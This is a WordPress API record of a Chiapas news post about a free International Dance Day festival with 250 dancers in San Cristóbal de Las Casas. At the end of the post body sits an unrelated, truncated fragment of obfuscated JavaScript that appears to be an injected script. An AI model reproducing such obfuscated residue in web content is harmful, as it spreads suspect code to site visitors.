{"id":1697,"date":"2022-04-28T02:53:17","date_gmt":"2022-04-28T02:53:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1697"},"modified":"2022-04-28T02:53:19","modified_gmt":"2022-04-28T02:53:19","slug":"celebran-en-san-cristobal-el-dia-internacional-de-la-danza","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1697","title":{"rendered":"Celebran en San Crist\u00f3bal el D\u00eda Internacional de la Danza"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"788\" height=\"720\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-27-at-5.36.18-PM.jpeg\" alt=\"\" class=\"wp-image-1698\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-27-at-5.36.18-PM.jpeg 788w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-27-at-5.36.18-PM-300x274.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-27-at-5.36.18-PM-768x702.jpeg 768w\" sizes=\"auto, (max-width: 788px) 100vw, 788px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Alrededor de 250 bailarines de 15 grupos de danza de esta ciudad, participar\u00e1n en la tercera conmemoraci\u00f3n del Festival del D\u00eda Internacional de la Danza, lo cual se realizar\u00e1 este viernes 29, seg\u00fan dio a conocer Sergio Cruz Trejo, organizador del evento. En entrevista, coment\u00f3 que esta es la tercera edici\u00f3n donde conmemoran esta fecha, lo cual nace a trav\u00e9s de la iniciativa ciudadana, que considera importante dar un lugar y un espacio a la danza de la ciudad, pues hay una comunidad interesante de bailadores, sin embargo no los conocen a todos. \u201cEste tipo de encuentros nos ayuda a darnos a conocer y dar un lugar a la danza en San Crist\u00f3bal, se hace una conmemoraci\u00f3n donde compartimos muchas experiencias, van a participar escuelas profesionales que vienen tambi\u00e9n de Tuxtla Guti\u00e9rrez, son varios g\u00e9neros, como danz\u00f3n, salsa, ritmos urbanos entre otros muchos\u201d.  Asimismo, dijo que participan ni\u00f1os de tres a\u00f1os en adelante, y es un festival donde participan de todas las edades y en varios g\u00e9neros, \u201ctenemos la ayuda de Coneculta, gracias a la gesti\u00f3n, nos han estado apoyando para realizar este festival, me interesa compartir y darle el lugar que merece a la danza\u201d. Finalmente, coment\u00f3 que gracias al trabajo que han realizado, los han invitado a participar fuera de la ciudad, \u201cpor ejemplo ahorita me invitaron a Comit\u00e1n para dar clases de danz\u00f3n, y hay que estar ah\u00ed para que sigan los proyectos, el festival va iniciar a las 4 de la tarde hasta las 9 de la noche, es gratuito y ser\u00e1 en el Teatro Daniel Zebad\u00faa\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- Alrededor de 250 bailarines de 15 grupos de danza de esta ciudad, participar\u00e1n en la tercera conmemoraci\u00f3n del Festival del D\u00eda Internacional de la Danza, lo cual se realizar\u00e1 este viernes 29, seg\u00fan dio a conocer Sergio Cruz Trejo, organizador del evento. En entrevista, coment\u00f3 que esta es &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1698,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1697","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1697","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1697"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1697\/revisions"}],"predecessor-version":[{"id":1699,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1697\/revisions\/1699"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1698"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1697"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}